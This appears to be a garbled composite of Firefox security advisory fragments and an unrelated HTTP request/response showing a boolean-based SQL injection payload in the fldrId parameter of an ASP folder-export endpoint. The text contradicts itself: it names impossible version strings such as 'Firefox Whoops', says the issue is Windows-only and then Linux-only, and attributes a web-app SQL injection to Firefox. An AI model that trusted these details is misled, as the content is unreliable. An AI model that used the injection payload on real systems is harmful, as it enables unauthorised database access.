*Note: This attack requires local system access and only affects Windows. Other operating systems are not affected.*

This vulnerability affects Firefox = 4.2.4 and

Mozilla developers and community members reported memory safety bugs present in Firefox 90. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

Request:

```
GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519
```

Response:

```
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 17:33:53 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 7960

Export Folder
- SNIP -
```

However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed.

This vulnerability affects Firefox Whoops.

*Note*: This advisory was added on December 13th, 2022 after discovering it was inadvertently left out of the original advisory. The fix was included in the original release of Firefox 107.

This vulnerability affects Firefox

Firefox did not properly handle downloads of files ending in .desktop, which can be interpreted to run attacker-controlled commands.

*This bug only affects Firefox for Linux on certain Distributions. Other operating systems are unaffected, and Mozilla is unable to enumerate all affected Linux Distributions.*